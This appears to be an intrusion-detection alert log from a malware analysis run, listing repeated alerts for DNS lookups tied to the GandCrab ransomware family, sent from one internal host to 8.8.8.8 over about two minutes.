Timestamp:	192.168.2.68.8.8.864650532026737 08/31/22-23:50:23.349894
SID:	2026737
Source Port:	64650
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862736532829500 08/31/22-23:49:54.873826
SID:	2829500
Source Port:	62736
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862225532829498 08/31/22-23:50:03.325419
SID:	2829498
Source Port:	62225
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.860013532829500 08/31/22-23:50:33.131001
SID:	2829500
Source Port:	60013
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.854883532829498 08/31/22-23:50:45.681352
SID:	2829498
Source Port:	54883
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.853592532829498 08/31/22-23:50:12.408515
SID:	2829498
Source Port:	53592
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856363532829500 08/31/22-23:50:13.551243
SID:	2829500
Source Port:	56363
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.851775532829498 08/31/22-23:50:06.195982
SID:	2829498
Source Port:	51775
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.859883532829498 08/31/22-23:49:13.365736
SID:	2829498
Source Port:	59883
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.854513532026737 08/31/22-23:50:28.034455
SID:	2026737
Source Port:	54513
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.855634532829498 08/31/22-23:49:19.687489
SID:	2829498
Source Port:	55634
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856574532829500 08/31/22-23:49:21.461712
SID:	2829500
Source Port:	56574
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856754532829498 08/31/22-23:49:57.581695
SID:	2829498
Source Port:	56754
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.853947532829498 08/31/22-23:49:03.979774
SID:	2829498
Source Port:	53947
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.854510532026737 08/31/22-23:50:25.933530
SID:	2026737
Source Port:	54510
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.855960532026737 08/31/22-23:49:42.892259
SID:	2026737
Source Port:	55960
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.864799532829500 08/31/22-23:50:34.845123
SID:	2829500
Source Port:	64799
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862539532026737 08/31/22-23:50:35.857432
SID:	2026737
Source Port:	62539
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.859885532829498 08/31/22-23:49:13.407922
SID:	2829498
Source Port:	59885
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.855632532829498 08/31/22-23:49:19.646853
SID:	2829498
Source Port:	55632
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.864407532829498 08/31/22-23:49:37.460209
SID:	2829498
Source Port:	64407
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.853196532829498 08/31/22-23:50:30.011263
SID:	2829498
Source Port:	53196
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856549532026737 08/31/22-23:49:08.357396
SID:	2026737
Source Port:	56549
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.858920532829500 08/31/22-23:49:15.820662
SID:	2829500
Source Port:	58920
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.853044532829500 08/31/22-23:50:24.850862
SID:	2829500
Source Port:	53044
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.851534532026737 08/31/22-23:48:55.046078
SID:	2026737
Source Port:	51534
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.858160532829500 08/31/22-23:50:17.191071
SID:	2829500
Source Port:	58160
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852718532026737 08/31/22-23:50:01.216655
SID:	2026737
Source Port:	52718
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862223532829498 08/31/22-23:50:03.241400
SID:	2829498
Source Port:	62223
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.853045532829500 08/31/22-23:50:24.871066
SID:	2829500
Source Port:	53045
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.850348532026737 08/31/22-23:49:17.376161
SID:	2026737
Source Port:	50348
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.860693532026737 08/31/22-23:49:57.038533
SID:	2026737
Source Port:	60693
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.864963532829498 08/31/22-23:50:19.837606
SID:	2829498
Source Port:	64963
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.864798532829500 08/31/22-23:50:34.824859
SID:	2829500
Source Port:	64798
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.854511532026737 08/31/22-23:50:27.946240
SID:	2026737
Source Port:	54511
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852717532026737 08/31/22-23:50:01.196442
SID:	2026737
Source Port:	52717
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856552532026737 08/31/22-23:49:08.420766
SID:	2026737
Source Port:	56552
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.851366532026737 08/31/22-23:50:14.041221
SID:	2026737
Source Port:	51366
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.860010532829500 08/31/22-23:50:33.071442
SID:	2829500
Source Port:	60010
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856430532829498 08/31/22-23:50:42.033912
SID:	2829498
Source Port:	56430
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856573532829500 08/31/22-23:49:21.437590
SID:	2829500
Source Port:	56573
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.859886532829498 08/31/22-23:49:13.428276
SID:	2829498
Source Port:	59886
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.855631532829498 08/31/22-23:49:19.625742
SID:	2829498
Source Port:	55631
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.854202532026737 08/31/22-23:50:33.636817
SID:	2026737
Source Port:	54202
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.854301532829500 08/31/22-23:50:47.037037
SID:	2829500
Source Port:	54301
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.851774532829498 08/31/22-23:50:06.176893
SID:	2829498
Source Port:	51774
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.854884532829498 08/31/22-23:50:45.706056
SID:	2829498
Source Port:	54884
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.849237532026737 08/31/22-23:49:22.906523
SID:	2026737
Source Port:	49237
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.857520532829498 08/31/22-23:49:46.246339
SID:	2829498
Source Port:	57520
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856128532829498 08/31/22-23:49:24.926548
SID:	2829498
Source Port:	56128
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862541532026737 08/31/22-23:50:35.901068
SID:	2026737
Source Port:	62541
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.849337532829498 08/31/22-23:50:15.074780
SID:	2829498
Source Port:	49337
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862543532829498 08/31/22-23:48:47.529672
SID:	2829498
Source Port:	62543
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.860001532026737 08/31/22-23:50:04.504698
SID:	2026737
Source Port:	60001
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862540532829498 08/31/22-23:48:47.468455
SID:	2829498
Source Port:	62540
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.857325532026737 08/31/22-23:49:33.986496
SID:	2026737
Source Port:	57325
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.853946532829498 08/31/22-23:49:03.959032
SID:	2829498
Source Port:	53946
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.853593532829498 08/31/22-23:50:12.431169
SID:	2829498
Source Port:	53593
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.849334532829498 08/31/22-23:50:15.005623
SID:	2829498
Source Port:	49334
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856434532829500 08/31/22-23:50:42.427928
SID:	2829500
Source Port:	56434
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.864966532829498 08/31/22-23:50:19.899743
SID:	2829498
Source Port:	64966
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.850345532026737 08/31/22-23:49:17.315311
SID:	2026737
Source Port:	50345
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862769532829498 08/31/22-23:49:54.349513
SID:	2829498
Source Port:	62769
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856297532829500 08/31/22-23:50:22.360506
SID:	2829500
Source Port:	56297
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856125532829498 08/31/22-23:49:24.863671
SID:	2829498
Source Port:	56125
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852819532829500 08/31/22-23:50:07.952331
SID:	2829500
Source Port:	52819
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.861174532026737 08/31/22-23:50:41.125728
SID:	2026737
Source Port:	61174
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862041532829498 08/31/22-23:50:38.028308
SID:	2829498
Source Port:	62041
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.854908532829500 08/31/22-23:48:50.285779
SID:	2829500
Source Port:	54908
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.861091532026737 08/31/22-23:49:53.336151
SID:	2026737
Source Port:	61091
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852720532026737 08/31/22-23:50:01.261421
SID:	2026737
Source Port:	52720
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.859340532829500 08/31/22-23:49:59.107861
SID:	2829500
Source Port:	59340
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856090532829500 08/31/22-23:49:06.157622
SID:	2829500
Source Port:	56090
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.860131532829498 08/31/22-23:49:54.397250
SID:	2829498
Source Port:	60131
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862226532829498 08/31/22-23:50:03.343591
SID:	2829498
Source Port:	62226
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.857326532026737 08/31/22-23:49:34.009679
SID:	2026737
Source Port:	57326
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.859341532829500 08/31/22-23:49:59.128177
SID:	2829500
Source Port:	59341
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862735532829500 08/31/22-23:49:54.851676
SID:	2829500
Source Port:	62735
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.851889532829498 08/31/22-23:50:24.330289
SID:	2829498
Source Port:	51889
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856436532829500 08/31/22-23:50:42.466214
SID:	2829500
Source Port:	56436
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.849336532829498 08/31/22-23:50:15.044470
SID:	2829498
Source Port:	49336
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.851323532829500 08/31/22-23:49:50.073092
SID:	2829500
Source Port:	51323
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.863266532829500 08/31/22-23:50:03.897271
SID:	2829500
Source Port:	63266
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.851776532829498 08/31/22-23:50:06.216035
SID:	2829498
Source Port:	51776
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.864800532829500 08/31/22-23:50:34.865341
SID:	2829500
Source Port:	64800
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856550532026737 08/31/22-23:49:08.378525
SID:	2026737
Source Port:	56550
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.851892532829498 08/31/22-23:50:24.391367
SID:	2829498
Source Port:	51892
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.859338532829500 08/31/22-23:49:59.065543
SID:	2829500
Source Port:	59338
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852846532026737 08/31/22-23:50:18.728478
SID:	2026737
Source Port:	52846
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.863673532829500 08/31/22-23:50:38.460458
SID:	2829500
Source Port:	63673
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.857519532829498 08/31/22-23:49:46.227969
SID:	2829498
Source Port:	57519
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.851532532026737 08/31/22-23:48:55.006743
SID:	2026737
Source Port:	51532
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.854203532026737 08/31/22-23:50:33.657267
SID:	2026737
Source Port:	54203
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862038532829498 08/31/22-23:50:37.962895
SID:	2829498
Source Port:	62038
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862540532026737 08/31/22-23:50:35.877444
SID:	2026737
Source Port:	62540
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.861094532026737 08/31/22-23:49:53.390900
SID:	2026737
Source Port:	61094
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.855959532026737 08/31/22-23:49:42.870749
SID:	2026737
Source Port:	55959
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.849470532026737 08/31/22-23:50:44.362254
SID:	2026737
Source Port:	49470
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.850256532829498 08/31/22-23:50:34.205420
SID:	2829498
Source Port:	50256
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856429532829498 08/31/22-23:50:42.013339
SID:	2829498
Source Port:	56429
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

